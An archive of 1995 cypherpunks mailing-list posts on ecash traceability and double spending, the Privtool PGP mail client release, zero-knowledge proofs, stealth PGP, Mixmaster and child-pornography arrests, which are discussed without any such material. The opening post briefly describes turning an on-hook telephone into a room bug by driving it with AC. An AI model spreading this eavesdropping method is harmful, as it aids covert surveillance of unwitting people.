>While not every telephone, every telephone switch is required
>to be tap capable  - The Digital Telephony Act.  Note there is
>provision for the government to pay costs for Telcos to make 
>their phones tappable - as yet unfunded by Congress.

Most telephones can be used to monitor conversations in the room they are
installed in even while on-hook. No need to ever enter the premises. Just
drive it with AC.  Look at your basic telephone diagram and remember
Xc=1/(omega*C) from your AC circuits class.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjO4yoZzwIn1bdtAQFmjwGAwMA+G0nO0m/lmYeqPJEsC5NJNLvS5cYk
+cMaVSJb+Kwk6+uywu8v088Ih8Nz7uo9
=elV9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 14 Sep 95 19:02:46 PDT
To: cypherpunks@toad.com
Subject: Re:  Celco Sting
Message-ID: <9509150202.AA07087@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>   A computer "hacker" is an individual with expertise in gaining
>   unauthorized entry into computer systems.

I heard the special agent in charge being interviewed on NPR this
morning.  He was very careful to distinguish between "classic hackers"
who just poke around for their own edification, and those who are
using networks to actively commit crimes.  My paraphrase, but it
was definitely a praiseworthy viewpoint.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 14 Sep 95 19:07:17 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <9509150206.AA07108@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Suppose we interpret Linking = Showing as
>
>For all web pages x and y,
>Showing(x) and  Linkto(x,y) --> Showing(y)

Then we would be fools.  No more so than buying a book means you
have instant access to all resources mentioned as footnotes or in
the bibliography.

Put more simply, *you have to click on Y* so they're not the same.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 14 Sep 95 22:34:01 PDT
To: cypherpunks@toad.com
Subject: Why ecash is traceable
Message-ID: <199509150532.WAA08865@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


There has been considerable discussion on sci.crypt and on the 
cypherpunks list about the fact that currently proposed digital cash is 
"traceable", or to put it another way, that there is no payee anonymity.  
This is an annoying asymmetry, where the payor is protected more than 
the payee.  But there is a fundamental reason for this, which I want to 
explain here.  It is not just perversity on the part of digital cash 
designers.

The problem is that there is a conflict between the desire for payee 
anonymity and the need to prevent double spending.  And preventing 
double spending is far more important, since without that the cash would 
be worthless.  Here is how the conflict occurs.

Suppose Alice has a piece of digital cash which she wants to spend with 
Bob.  She goes through some protocol and transfers data to him.  Bob, 
then or later, sends some resulting data to the bank and gets his 
account credited.  Now if Alice spent that same coin with Charlie, we 
need to have the bank find it out.  When Charlie deposits his data with 
the bank, and the bank compares that with what Bob sent in, there must 
be a red flag that goes up.

The fundamental requirement of preventing double spending implies that
Bob's and Charlie's data, when sent to the bank, has some correlation
which will identify the fact that they both come from the same coin.
It doesn't matter exactly what the form of this data is, or how it has
been blinded and stirred, but if double spending is to be detected
there must be a correlation which the bank can see.

But this correlation is what makes the coin traceable.  Suppose Alice is 
paying a coin to Bob via an anonymous network, and she and the bank 
are going to try to figure out who he really is.  She goes through the 
payment transaction, and Bob sends his resulting data to the bank.  
Before doing so, though, Alice simulates a payment of the same coin to 
Charlie.  Charlie doesn't actually have to be involved, Alice can just 
go through what she would have done if she had spent the coin elsewhere.  
The result of this simulated payment has been shared with the bank.

Now, when Bob deposits his data, the bank compares it with the data 
Alice sent, the result of her simulated spending of the same coin.  By 
the argument presented above, Bob's deposit will be flagged.  It will 
correlate with the data Alice sent in since this will be the equivalent 
of a double-spending.  So when Bob makes the deposit he can be linked to 
the specific coin payment which Alice made, and his anonymity is lost.

It would seem that any system which is capable of detecting double-
spending just from the information which the payees send in to the bank 
would be vulnerable to this.  Systems which use tamper-proof observer 
chips to prevent double spending beforehand can avoid it, but of course 
if someone breaks an observer the whole cash system might crash.  In 
general it does not look like payee anonymity is possible without giving 
up other very important features.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 14 Sep 95 19:52:46 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509142253.SAA63671@tequesta.gate.net>
Message-ID: <Pine.D-G.3.91.950914224730.17369B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Jim Ray wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Brian Davis wrote:
> 
> <snip>
> 
> >Just wondering about liability issues after state accrediting is dead.
> 
> <snip>
> 
> <I can resist jumping in no longer...>
> 
> Despite loud squawking, "chaos" will not ensue. Instead, the private
> sector will take over assesing risk, which it has always done better.
> 
> An example: I'd rather jump into a full bathtub with a plugged-in,
> UL [Underwriter's Laboratories] certified TV set than take the FDA
> approved (but very dangerous, IMO) prostate drug called "Proscar."
> While there is only one UL (by choice, not force) and only one FDA
> (by force, not choice) I can easily imagine a  lawyer-certifying
> companies like UL for appliances, probably tied [like UL] to the
> insurance industry. [I am not a lawyer, or a doctor either.]
> JMR

Last I checked, FDA, UL, or state bar association approval does not 
*require* you to take, use, or hire the approved drug, toaster or lawyer.  
Market forces are still at work, albeit in a filtered environment.
Just a first cut.  And even that can usually be gotten around.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 14 Sep 95 15:00:55 PDT
To: alt.security.pgp@news.news.demon.net
Subject: Privtool 0.85 Released
Message-ID: <Pine.3.89.9509142224.A21514-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Hi,

I've just released a new version of Privtool, with a large number of
bugfixes and new features. It's available from ftp.c2.org as
/pub/privtool/privtool-0.85.tar.gz, and in Europe from
ftp.dsi.unimi.it in /pub/security/crypt/code, or from ftp.ox.ac.uk
in /pub/crypt/pgp/utils.

DUE TO US ITAR REGULATIONS, IF YOU ARE OUTSIDE THE US YOU SHOULD
DOWNLOAD PRIVTOOL FROM A NON-US SITE. Dumb, but true...

Documentation is also available on the WWW at 
http://www.c2.org/~mark/privtool/privtool.html.

	Mark




	Privtool Beta Release	@(#)README.1ST	1.34 9/12/95
	-----------------------------------------------------

Privtool ("Privacy Tool") is intended to be a PGP-aware replacement 
for the standard Sun Workstation mailtool program, with a similar user 
interface and automagick support for PGP-signing and PGP-encryption. Just 
to make things clear, I have written this program from scratch, it is
*not* a modified mailtool (and I'd hope that the Sun program code
is much cleaner than mine 8-) !). 

When the program starts up, it displays a list of messages in your 
mailbox, along with flags to indicate whether messages are signed 
or encrypted, and if they have had their signatures verified or 
have been decrypted.

When you double click on a message, it will be decrypted (requesting
your passphrase if neccesary), and/or will have the signature checked,
and the decrypted message will be displayed in the top part of the
display window, with signature information in the bottom part. The
mail header is not displayed, but can be read by pressing the 'Header'
button to display the header window. In addition, the program has
support for encrypted mailing list feeds, and if the decrypted
message includes another standard-format message it will replace
the original message and be fed back into the display processing
chain.

When composing a message or replying to one, the compose window has
several check-boxes, including one for signature, and one for
encryption. If these are selected, then the message will be automatically
encrypted and/or signed (requesting your passphrase when neccesary) before
it is sent. You may also select a 'Remail' box, which will use the
Mixmaster anonymous remailer client program to send the message through
one or more remailers.

Being an Beta release, there are a number of bugs and nonfeatures :

Known Bugs :

	When you save changes to the mail file, it throws away the
	signature verification and decrypted messages, so that the
	next time you view a message it has to be verified or decrypted
	again.

	Privtool requires that the /usr/spool/mail directory is
	world-writable. Some versions of Linux are set up to have
	mail programs setgid mail, and have write access only to
	mail and root, causing hangs when saving changes. This will
	be fixed in the next release.

	Header window is not updated if left open.

	Date parsing on Linux is not quite correct.

	Problem with compose window layout if using Bcc: or extra
	header lines.

	Crashes if you tab from the Cc: field to the message body.

Known Nonfeatures :

	Currently if you send encrypted mail to multiple recipients, all must
	have valid encrpytion keys otherwise you will have to send the
	message decrypted. Also, the message will be sent encrypted to all
	users, not just the one who is receiving each copy.

	Only one display window.

	Code should be more modular to assist with ports to Xt, Motif, Mac,
	Windows, etc. 

	Not very well documented !

	Encrypted messages are saved to mail files in encrypted form. There
	is currently no option to save messages in decrypted form.

	No support for anonymous return addresses.

	Not very well tested on Solaris 2.x, or Linux.

Changes for 0.85:

	Support for Reply-To: addresses in message headers.

	If you have PGP Tools, then the passphrase is now stored in
	MD5 form rather than as ASCII text. This will make it harder
	to steal your passphrase if you're running on a multi-user
	machine (which you shouldn't be, but many of us are).

	Improved documentation.

	'New mail' indicator in icon now goes away if you open the
	window and close it again without reading any messages.

	Support for multiple compose windows - no more pressing
	'Reply' and screaming because you deleted the message you
	were editing !

	Query on exit if any compose windows are open.

	Show busy cursor for time-consuming operations.

	Kill-by-name and Kill-by-subject now work correctly.

	'Add Key' button now works.

	Optionally beep on bad signature.

	Added various changes from Anders Baekgaard (baekgrd@ibm.net),
	we can how use a more normal icon if preferred, pass arguments
	on the command line, specify the font to use, support the
	'showto' option, allow X-resources to be set up, fix a bug
	in Linux which showed the message list as a black box, cleaned
	up some warnings from x.c, support bcc:, and have an option
	for a simplified, smaller, display layout for machines with
	small screens.

	Fixed some memory leaks in deliver_proc ().

	Anders finally got the scrollbar to go to the right place
	when opening mail files ! Yay !!!!

	Fixed bad arguments that were being passed to bzero() in
	pgplib.c and potentially causing random memory overwrites.

	Fix for Linux icon corruption from A J Teeder (ajteeder@dra.hmg.gb).

	Added 'resend' to resend a message that failed the first
	time.

	Added Linux-specific Makefile, now that I have my own Linux
	box to test it on.

	Fixed SEGV when delivering messages (with some .mailrc files), 
	caused by a bug in the alias-handling code.

Privtool can be compiled to either use PGP Tools, or to fork off a copy of
PGP whenever it is needed. There are also a number of different security
level options for the passphrase, varying from 'read it from PGPPASS and
keep it in memory' to 'request it every time and delete it as soon as
possible', via 'request it when neccesary and delete it if it's not used
for a while'.

Unfortunately, PGP Tools (or at least the version that I have) does not 
appear to work correctly on Linux.

See the README file for information on compiling the code, and the
user.doc file for user documentation (the little that currently 
exists). You should also ensure that you read the security concerns
section in user.doc before using the program.

		Mark Grant (mark@unicorn.com)



-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAgUBMFileFVvaTo9kEQVAQFU6ggAk9MWUkT3b6b6dGpzZSiCR/pGM6SMdXIP
ZCcE546a65cOl3esgdVSSUlaw3SDGt1FxuHB/pzPqTJBqaZNsPoSrvZbPSz0Fcl7
GjuDCGFIm4vPYi8tgoTc2WPbj4E0w1O5+vZvZWwvm/TrzfYNeMnlI3wWb18U+TXF
hj9tOKbd1rmzx3an/ZGgfFzwlKtidPbLhOPxxv7XWFkpZAXbKAesKPw85sNilxy4
NwerRu9OAXBVNHGgJfM6S6+qfYygCuzIodseMwpOU+7uL1MfvB6LFJ5WL3di3FdA
Hnv2CKbqmEVWlFc1TIY0mK6Ze+U/uRlgbM04/GLk1X3qM8r4SQUqwg==
=jd5V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 14 Sep 95 20:11:58 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
In-Reply-To: <ac7de719050210049b11@[205.199.118.202]>
Message-ID: <9509150310.AA32542@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



The cave analogy sucks.

The way I tried to explain Zero Knowledge is this:


Imagine that you have a duplicator device which you want to sell, you don't
want to explain why it works to the buyer however since then they would 
just make their own (patents have been abolished by this time). You also don't 
want the buyer to be able to prove to anyone else that you have a duplicator.

So what you do is you play the "what hand is it in game" and you do this with a 
10$ bill provided by the buyer and who records its serial number. You hold the 
original article in one hand and the duplicate in the other. The buyer choses 
one hand, you show the article in that hand. The buyer knows you had a 50:50 
chance of a lucky guess so you do it again, each time the probability of getting 
it right by a lucky guess halves. After 10 tries or so it is virtually certain 
that you were not faking.


Any better ideas...

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 14 Sep 95 20:22:10 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedaphiles, and Terrorists, oh my
In-Reply-To: <199509150006.UAA17827@book.hks.net>
Message-ID: <9509150321.AA28976@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>ANYBODY on this list seen some real kiddy porn on the net? I am talking
>intercourse, etc., not scans of six year olds from the Sears catalog, or
>naked boys building sandcastles on the beach.

Yes, I was specificaly refering to hard core images depicting intercourse with 
minors, including very young children. This was injected into the USEnet over a 
period of about 3 months from a number of sites. I do not know if the persons 
arrested today are the alledged source.


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Sep 95 00:14:56 PDT
To: cypherpunks@toad.com
Subject: Re: Why ecash is traceable
Message-ID: <ac7e684708021004f594@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Hal, a very nice summary!

I have some questions, though.

At 5:32 AM 9/15/95, Hal wrote:

>The problem is that there is a conflict between the desire for payee
>anonymity and the need to prevent double spending.  And preventing
>double spending is far more important, since without that the cash would
>be worthless.  Here is how the conflict occurs.

Agreed, any system which allows makes double spending possible results in a
currency collapse as the currency becomes worthless.

Chaum points out that there "is no digital coin," that is, that software
(numbers) must by their nature be easily copyable. Thus, any system to
prevent double (triple, quadruple, etc.) spending must take this into
account.

Why not "online clearing" as the preferred model, then?

To use your example:

>Suppose Alice has a piece of digital cash which she wants to spend with
>Bob.  She goes through some protocol and transfers data to him.  Bob,
>then or later, sends some resulting data to the bank and gets his
>account credited.  Now if Alice spent that same coin with Charlie, we
>need to have the bank find it out.  When Charlie deposits his data with
>the bank, and the bank compares that with what Bob sent in, there must
>be a red flag that goes up.

With online clearing, Bob sends his data to the relevant bank, confirms
that his account has been credited, and tells Alice that her "check has
cleared," so to speak, and the transaction is completed. Then, when Alice
tries to spend the "same" digital cash with Charlie, he sends his data to
the bank and the bank tells him the money has already been spent. Charlie
informs Alice that the transaction has failed, that her money is no good.

I'm not claiming this is how Chaum's currently-available system works, only
that nothing in Chaum's scheme hinges on a True Name, of course. So with
online clearing, the second spending is blocked, but there is still no
leakage of identity, is there?


>The fundamental requirement of preventing double spending implies that
>Bob's and Charlie's data, when sent to the bank, has some correlation
>which will identify the fact that they both come from the same coin.
>It doesn't matter exactly what the form of this data is, or how it has
>been blinded and stirred, but if double spending is to be detected
>there must be a correlation which the bank can see.

I agree. But this is like the following analogy:

Alice has a special kind of money, called a "train locker combination."
This special kind of money is the location of a storage locker and the
combination of a lock on the locker. She "spends" this special kind of
money by giving this information to the person she is paying. The recipient
has a couple of basic options:

1. Send someone to verify that the locker contains the specified goods, at
which point the transaction is completed. This is equivalent to ONLINE
CLEARING.

(I'm not going to get into the situation where he gets the money, then
cancels or reneges on the deal....this is a possibility in "cash"
transactions as well, save with escrow schemes, and even then...)

2. Accept the word of Alice (in the sense of not actually transferring the
money via online clearing) and count on systems which implicate her if she
tries to spend the money a second time, i.e., tries to tell someone else
the locker and combination.

(The "observer chip" option Chaum raises, and which may have a parallel
here, I'm not considering. I'm deeply suspicious of solutions calling for
tamper-resistant hardware...just not very strong by cryptographic
standards, etc. Maybe I'm just ignorant, but the observer chip approach
Chaum described in his "Scientific American" article a few years ago was
unconvincing to me.)

The elegance of the first option, online clearing, is that Alice is
motivated to keep her secret information (the money) secret, and that once
it is "spent," or cleared and transferred, there's no going back. She can't
renege, she can't collude with the bank to see where it went. The bank,
upon valid receipt of an order to "cash" the "check" then could place the
money in an "envelope" (in Chaum's terms) supplied by Bob and then post it
in a message pool. (Bob can submit his claim to the money via remailers,
and receive the money-in-envelope via remailer return replies (if they ever
get perfected, as I suspect they will be) or via message pools. Bob
receives the envelope and reverses the blinding operation, thus having cash
not traceable to him in any way.

I'm persuaded that the second approach, involving protocols for revealing
double spending, is much messier than the "he who gets there first"
protocol. The online clearing model largely emulates how real physical cash
works, where there is a direct transfer, where the cash must be protected
against loss (lose it and you're just out of luck, unlike, say, as with
traveller's checks, which are account-based), and where a kind of "online
clearing" is actually done when the cash is checked to see if it's
counterfeit.


>But this correlation is what makes the coin traceable.  Suppose Alice is
>paying a coin to Bob via an anonymous network, and she and the bank
>are going to try to figure out who he really is.  She goes through the
>payment transaction, and Bob sends his resulting data to the bank.
>Before doing so, though, Alice simulates a payment of the same coin to
>Charlie.  Charlie doesn't actually have to be involved, Alice can just
>go through what she would have done if she had spent the coin elsewhere.
>The result of this simulated payment has been shared with the bank.

With online clearing, this kind of "sting" by Alice is impossible (at least
in the way described here). Alice pays Bob, Bob sends his data to the bank,
the bank reports the money has already been transferred (or, simply reports
back "invalid transaction").

An account-based system, one that doesn't do online clearing, will need the
correlation that Hal cites. An online system will not...whoever gets to the
money first gets it, as with real cash.

(There are more abstract ways of viewing this advantage. While mere
software is always duplicable, and cash numbers are of course duplicable,
one thing that is not duplicable is this: "the first agent to present a
valid number at this bank." There can be only one of these, and this
uniqueness is what keeps the currency from collapsing, what introduces
_conservation_ into the system.)

>Now, when Bob deposits his data, the bank compares it with the data
>Alice sent, the result of her simulated spending of the same coin.  By
>the argument presented above, Bob's deposit will be flagged.  It will
>correlate with the data Alice sent in since this will be the equivalent
>of a double-spending.  So when Bob makes the deposit he can be linked to
>the specific coin payment which Alice made, and his anonymity is lost.

Well, since Alice knows her own blinding factors, she will always be able
to say to the bank: "My cash will look like this. Watch for it."

The key is for Bob to take the cash Alice gives him and communicate to and
from the bank with mixes, as described above.


                       Bank
                      /    \
                     /      \
                    /        \
                 Alice - - - Bob


(Sorry I can't flesh out this diagram....ASCII just won't cut it. Mere
English is even worse at describing these transactions.)

Another elegant way of viewing things: If Alice colludes with the bank, by
doing a fake-spend with the fake "Charlie," or by reporting to the bank
what her blinding factor will be and hence what "her" cash will look like,
then effectively the transaction collapses to:


                 Alice/Bank
                      \
                       \
                        \
                        Bob

But if Bob can get cash from the bank that the bank cannot trace, via the
blinding factors, then Bob can get cash from the Alice/Bob collusion. The
fact that Alice can correlate a particular transaction to Bob's contact
with the bank can be defeated by Bob using anonymous remailers to protect
his identity.

My Apologies: I suspect I've been rambling a bit, thinking out loud by
typing. There are different issues involved here: offline vs. account-based
systems, the use of remailers and message pools to sever the links between
transactions and identities, and the (mostly unmentioned) role of
third-part escrow agents and "anonymizers." (Think of what happens when
online clearing is used to shuttle the cash between N different
agents...even if Alice is colluding, will Candy, Devon, Eric, Floyd, etc.
all be in the same collusion set?)


>It would seem that any system which is capable of detecting double-
>spending just from the information which the payees send in to the bank
>would be vulnerable to this.  Systems which use tamper-proof observer
>chips to prevent double spending beforehand can avoid it, but of course
>if someone breaks an observer the whole cash system might crash.  In
>general it does not look like payee anonymity is possible without giving
>up other very important features.

I don't think all systems must be able to deal with double spending.

For example, the first person to read this number: 45%2)d[12ks&Qmdx and to
then submit it any form--in person, by e-mail, via remailer, etc.--to The
First Bank of Cyberspace will have $10 sent to him or her, as cash or as a
spendable amount of digicash (untraceable to recipient, of course).

Where's the payee traceability that I, the payer, have?

(The key is that I don't have to deal with double spending, as there is
only one "first person to ....")

I believe Chaum has thought about the issues in creating "Pure Digital
Cash." While a pure "digital coin" may not be possible, I believe a two-way
untraceable digital cash system is possible.

Frankly, I think Chaum's work on DC-Nets points the way, though even
simpler realizations may be enough for practical purposes.

My hunch, just a hunch, is that Chaum has been concentrating on the
particular protocols which avoid online clearing and which avoid avoid the
payer/payee untraceability for pragmatic reasons. Pragmatic as in
"politically wise."

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 21:25:35 PDT
To: cypherpunks@toad.com
Subject: [non-crypto] Any info on Motorola Digital cell phone?
Message-ID: <199509150423.AAA19333@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Well, I finally broke down and bought a cell phone.  Motorola Digital
52134 flip style. Would the (numerous) cell phone pros on this list please
get in touch with me and teach me the things not mentioned in the manual?

Thanks guys and gals,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFj/pyoZzwIn1bdtAQGVTAGAmjw4ryqx3SiaPyFscACXsgCfq7ATT5EZ
8URi+2KH2e5xSLeOgj0+R+Z6Bcvvxoas
=zXFO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 00:26:14 PDT
To: perry@piermont.com
Subject: Re: PGP in UK - snooped as unSTEALTHed?
Message-ID: <199509150725.AAA11217@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:29 AM 9/12/95 -0400, Perry wrote, replying to Gary:
>>    When are the PGP designers and coders going to get serious
>>    and develop STEALTH PGP inside PGP itself!?
>Never, I hope. It would dramatically lower the utility of the
>system. Can you imagine how disgusting it would be to try decrypting
>something if you have a dozen keys outstanding? 

I disagree - if it's done right, the degree of stealth can be
user-selectable, and even moderately stealthy options can tell
which key to use without giving away much information.  (For instance,
4 bits of keyid isn't very revealing, but will tell you which one or
two of your dozen keys to try.)  Have the most non-stealth options
indicate that it's PGP-encrypted and addressed to keyid 0x12345678,
Joe User <joe@foo.com>, blah, blah.

The basic problem is that stealth wasn't an original design criterion,
so many parts of the PGP data format reveal at least that PGP is
being used, and occasionally other information as well.  Some things
are easy to work around (----- BEGIN PGP etc.), and some aren't.
Changing this takes a substantial amount of redesign.

>Not to mention how
>hard it would be to deal with figuring out that you should even try to
>decrypt things in the first place.
As you say a couple paragraphs later:
>If someone sees a bunch of random numbers in mail sent by me, it's going 
>to be pretty obvious what the hell is inside anyway.
Similarly, if someone emails you a bunch of random numbers....

>I very much see this whole thing as a non-issue.

Most of the time, for most users now, it's not an issue.  
But there are people who will need to hide encrypted messages, 
and as anti-privacy laws in the US become stronger, that may be us.
Is this an issue for PGP 3.0.1, or an issue for Privacy:TNG?
Probably the latter, given the state of the PGP world,
and certainly ranting at the developers to do it now is uncool.
But it should be a design goal.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 15 Sep 95 01:06:28 PDT
To: cypherpunks@toad.com
Subject: RE: Mixmaster status
Message-ID: <ac7edf5800021004fd74@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I apologize for being so terse in my first message. This is not a red
herring. The organization that has approached me is very pro-privacy and
anonymity. I see nothing but good coming from this venture.

I will be very active in the development of the commercial version of
Mixmaster.

Let me be crystal clear.
1) I will not support any version of Mixmaster that is weakened.
2) All future clients will be able to generate the current message format.
3) All future servers will be able to read the current message format.
4) There will always be a free version of the client with source code.

While I have not discussed it, I can not imagine that there would not also
be a free version of the server code (with source). Without remailers what
is the point of the client software? 


At 8:45 PM 9/14/95, ROBO Mixmaster Remailer wrote:
>Flame Remailer <remailer@flame.alias.net> wrote:
>
>> Subject: Mixmaster status
>>
>>   There has been an offer to purchase and commercially develop Mixmaster.
>>   This will hasten the development of Mixmaster for other platforms (e.g.
>>   Dos, Windows  Macintosh), and bring significant improvements to the
>>   interface, but I will not compromise on the level of security provided by
>>   Mixmaster. Free client software will continue to be available.
>>
>>   This could be the big breakthrough for remailers, finally thrusting them
>>   out of the hobbyist's closet into the corporate world.
>>
>> I wonder. Where is the commercial market for remailers? Who has an
>> application for them except hobbyinst? Why would there be a commercial
>> incentive to run a mixmaster server, or even a client?
>>
>> Could this "offer" be a red herring?
>
>I wondered the same thing myself.  It would certainly be a more
>cost-effective way for the NSA to compromise Mixmaster technology
>than by brute force.
>
>Consider this scenario ...  Mixmaster get's bought by the Acme
>Crypto Company of Ft. Meade, MD.  They "improve" it, and offer a new
>version.  It's even FREE (for non-commerical use)!  But their
>"improvements" make it incompatible with previous versions, and so
>you have to upgrade.  The new "commercial" version comes with no
>SOURCE CODE, of course...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFkzR/Pzr81BVjMVAQH6hAf+O+QdTEzNjUh0FYlJEnCakNws4MxPrOt4
miMPaz/aWDOReGb62UPZAEMNXP+hjgy0kTjW4xReTTBAPgtcsInr1Cct6MPr3O/r
PGMGmE9z2Fkv3/k7MDG1NiptT2/RwVtmDikIJEQuH5j8ijir28Vvrk9Vs685Qc3j
bFz5Q8uRLd57Uk51tQwIiBM6CJ4suQ3WFN++QNTHM9E47J9W8yFBux6ePWPlZOK8
8BnKkhY/auPm85X3MVZhL3y7F6zbFuqPpZrsKpwOOkme8o4l71t2xyhGcZHHxiB7
JLF2As9pNXsKWpYiPZEHTV9hsgxQTHortdhq25DeGyoxhZSrZByP/w==
=+O16
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 02:08:39 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedophiles, and Terrorists, oh my
Message-ID: <199509150908.CAA22145@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 9/14/95 -0400, Phill wrote:
>Yes, I was specificaly refering to hard core images depicting intercourse with 
>minors, including very young children. This was injected into the USEnet
over a 
>period of about 3 months from a number of sites. I do not know if the persons 
>arrested today are the alledged source.

Anybody interesting in doing a FOIA to find out whether the government is
posting them?  For that matter, is the Post Office, as a semi-non-governmental
organization, subject to FOIA?
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 15 Sep 95 02:08:46 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why ecash is traceable
Message-ID: <199509150908.CAA22153@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I first reacted to Hal's posting about the way Tim did.
I got confused by the "Charlie" issue, but I think I see it.

>Why not "online clearing" as the preferred model, then?

It's probably still possible to do _some_ tracing in an online system.
As in the previous example, Alice is going to conspire with the
bank to catch Bob, _before_ she pays Bob the money; afterwards is 
too late.  Alice creates an account Alice2 and spends the cash.
Then she pays Bob the same cash.  When Bob tries to deposit it,
the bank notices it's already been spent, and does one of
1) rejects the payment using the normal double-spending prevention
   (not very useful for kidnapping/ransom cases, since Bob
    may kill the victim or whatever)
2) detects the double-spending but uses special-case software to
   tell Bob they're accepting the payment, and trace his account
   or trace the place he's depositing it from, or not actually credit
   it the money they're sending him a receipt for, or whatever.

If Bob wants to prevent the bank from tracing his deposit back to him,
he'll need an anonymous on-line connection; this would probably need
to be some sort of packet laundry, which is easy enough to implement,
or at least a fancy firewall.  If Bob is a real Bad Guy (as opposed
to Alice being the Bad Guy), Bob will probably set up some kind
of temporary account at the bank to deposit the money in,
followed rapidly by withdrawing the money and abandoning/closing
the account.  If Bob is a kidnapper, he probably kills the kid;
if he's just an undocumented retailer, he may not ship the pharmaceuticals,
or may start announcing that Alice is a probable narc.

>[online clearing vs. double-spender detection]
>I'm persuaded that the second approach, involving protocols for revealing
>double spending, is much messier than the "he who gets there first"
>protocol. The online clearing model largely emulates how real physical cash

There are difficulties, with online clearing, though - with physi-cash,
Bob can look at it and say "it looks good/bad" without actually
possessing it; with online clearing, he can lie about "it was pre-spent",
and there's no way to let him check the cash except by either giving it
to him or using messy all-or-nothing-disclosure-of-secrets techniques
(e.g. Alice and Bob flip a coin to decide whether Bob gets to spend
a pre-committed digibuck or Alice gets to demonstrate that it's ok
and spend it first) though an online system could reduce this problem
substantially by recording the time that a given digicash was spent
and reporting that time in double-spending rejections (a first-spending
at approximately the same that Alice gives Bob the money and he deposits it
is obviously suspicious; it doesn't actually identify which one
of them cheated, though they'll both know (unless it was the bank cheating). 
A first-spending time substantially before that implicates Alice.)

>Well, since Alice knows her own blinding factors, she will always be able
>to say to the bank: "My cash will look like this. Watch for it."

Unfortunately, it's probably a lot harder to design a blinding system
that lets the payee blind the cash without allowing him to create
